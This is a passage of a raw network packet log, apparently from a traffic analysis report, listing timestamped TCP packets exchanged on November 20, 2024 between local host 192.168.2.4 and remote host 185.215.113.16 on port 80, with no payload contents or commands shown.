                                                                                                                                                                                            Nov 20, 2024 21:04:30.950330019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.950392008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.951025009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.951164007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.951221943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.951975107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.952145100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.952207088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.952903986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.953203917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.953638077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.953830957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.953897953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.953948975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.954822063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.954885960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.954936028 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.955771923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.955879927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.955933094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.956727982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.956864119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.956916094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.957729101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.957806110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.958611012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.958749056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.958909035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.958990097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.959675074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.959819078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.959877014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.960726976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.960907936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.960962057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.961378098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.961491108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.961577892 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.962285042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.962371111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.963222027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.963282108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.963362932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.963413954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.964119911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.964288950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.964340925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.965152025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.965280056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.965329885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.966006041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.966169119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.966217041 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.966931105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.967082977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.967830896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.967890978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.967947006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.968003988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.969039917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.969161034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.969211102 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.969691038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.969799042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.970046997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.970669031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.970876932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.970927954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972213984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972425938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972476006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972537994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972556114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:30.972790003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:30.973422050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.019139051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098359108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098408937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098439932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098472118 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098633051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098680973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.098692894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.099556923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.099616051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.099695921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.100518942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.100590944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.100620985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.101407051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.101458073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.101505995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.102407932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.102425098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.102469921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.103421926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.103477955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.103488922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.104226112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.104274035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.104334116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.105207920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.105256081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.105263948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106169939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106240034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106268883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106803894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106862068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.106908083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.107764006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.107817888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.107825994 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.108689070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.108738899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.108809948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.109615088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.109677076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.109786034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.110553026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.110604048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.110632896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.111462116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.111534119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.111567974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.112437963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.112483025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.112514973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.113334894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.113400936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.113488913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.114281893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.114342928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.114373922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.115205050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.115257025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.115295887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.116132021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.116177082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.116216898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.117078066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.117153883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.117192030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.117997885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.118052006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.118175030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.118925095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.119026899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.119035959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.119936943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.119988918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.119988918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.120798111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.120913982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.120938063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.121733904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.121790886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.121937037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.122704983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.122761965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.122785091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.123610973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.123658895 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.123723030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.124567032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.124615908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.124628067 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.125504971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.125633955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.125662088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.126442909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.126504898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.126530886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.127413034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.127470016 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.127506971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.128501892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.128561020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.128592968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.129247904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.129292011 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.129309893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.130146980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.130201101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.130244970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.131166935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.131205082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.131227970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.132014990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.132067919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.132112026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.132957935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.133014917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.133043051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.134008884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.134095907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.134099007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.135116100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.135181904 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.135202885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.136109114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.136147976 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.136729002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.137170076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.137213945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.137348890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.138322115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.138391018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.138467073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.139229059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.139270067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.139286041 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140041113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140089989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140130043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140834093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140881062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.140929937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.141597986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.141649008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.141704082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.142288923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.142338037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.142386913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.143297911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.143364906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.143384933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.144148111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.144210100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.144253016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.145123959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.145174980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.145236015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.146054983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.146111012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.146205902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.146905899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.146996975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.299459934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.299707890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.299882889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.299900055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.299957991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.300766945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.300992966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.301052094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.301702976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.301940918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.302009106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.302628994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.303138971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.303193092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.303572893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.303694963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.304610014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.304671049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.304716110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.304763079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.305452108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.305788994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.306405067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.306457996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.306494951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.306539059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.307358980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.307465076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.308208942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.308264017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.308429003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.308474064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.309170961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.309186935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.309313059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.310092926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.310228109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.310285091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.310992956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.311270952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.311932087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.311990976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.311997890 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.312036037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.312958956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.313030958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.313647032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:31.313790083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.314039946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:31.314696074 CET8049744185.215.113.16192.168.2.4
